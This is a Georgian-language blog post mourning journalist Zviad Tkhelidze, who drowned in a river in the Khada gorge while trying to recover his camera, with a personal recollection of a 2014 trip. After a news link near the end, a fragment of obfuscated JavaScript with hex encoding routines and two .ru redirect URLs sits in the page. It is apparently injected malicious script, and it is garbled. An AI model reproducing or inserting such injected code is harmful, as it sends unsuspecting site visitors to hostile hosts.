RSS

ზვიად თხელიძე პროფესიული მოვალეობის შესრულების დროს დაიღუპა

30 May

me da zviad txeliZeორი დღის წინ, ელექტრონულ ფოსტაზე წერილი მომივიდა, სადაც ეწერა, რომ დუშეთის რაიონში, ხადას ხეობაში, მდინარემ მამაკაცი გაიტაცა… არ ვიცი, რატომ არ გამოვაქვეყნე… ხელი არ მომიტრიალდა, რატომღაც…. მოგვიანებით ვგებულობ, რომ ის ადამიანი, რომელიც მდინარემ გაიტაცა შენ ხარ – ზვიად თხელიძე – უზომოდ თავდადებული და მოყვარული შენი ქვეყნისა და საქმისა… და ამ ამბავს ეს მშრალი ნიუსი მამცნობს – ტელეკომპანია GDS-ის გადაცემა „2030“-ის ჟურნალისტი ზვიად თხელიძე უბედური შემთხვევის შედეგად, სამსახურებრივი მოვალეობის შესრულებისას, გარდაიცვალა.

ზვიად თხელიძეს დუშეთში, ხადას ხეობაში, მდინარეში გადასაღები აპარატი ჩაუვარდა. მისი ამოღების მცდელობისას კი მდინარეში ჩავარდა და დინებამ გაიტაცა. ადგილზე 50-მდე მაშველი მუშაობდა. გარდაცვლილი…იპოვეს.

არ ვიცი რა უნდა დავწერო, ან რა უნდა ვთქვა ისეთი, რომელიც ოდნავ მაინც შეუმსუბუქებს შენს დაკარგვას შენს ახლობლებს…

ვუსამძიმრებ მის ოჯახს, ყველა მის ახლობელს, თანამშრომელს, ყველა “მთავარ გაზეთელს”… – ის ჩვენი ოჯახის წევრი იყო და ასეც დარჩება – ჩვენი….

ეს ფოტო გადაღებულია, 2014 წლის ოქტომბრის ბოლოს, სტორის ხეობაში, როცა თუშეტისკენ მიმავალ გზაზე, სტორის ხეობაში ჟურნალისტებთან და “სენის” წარმომადგენლებთან ერთად, რეკრიაციულ ზონებს ვსწავლობდით და ვაზუსტებდით, სად უფრო კარგი იქნებოდა ტურისტებისთვის დასასვენებელი ადგილების მოწყობა, ისე, რომ ხეობის გარემოსთვის ზიანი არ მიეყენებინათ… ცოტა ხანში, იქ “სენის” ხელშეწყობით, კეთილმოეწყო კიდეც… იქ წასვლას კიდევ ვგეგმავდით… უსაზღვროდ უყვარდა და ტკიოდა სამშობლო… ბევრს მოგზაურობდა და მართლა ძალიან კარგ რეპორტაჟებს აკეთებდა…

ფოტოზე ზვიადი, მე და ზაზა ლაგაზიძეა.

 

 

http://www.palitratv.ge/akhali-ambebi/sazogadoeba/73463-emociuri-tsuthebi-2030-is-tsamyvanma-tragikulad-daghupuli-kolegis-samdzimari-dzlivs-gamoackhada.html// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s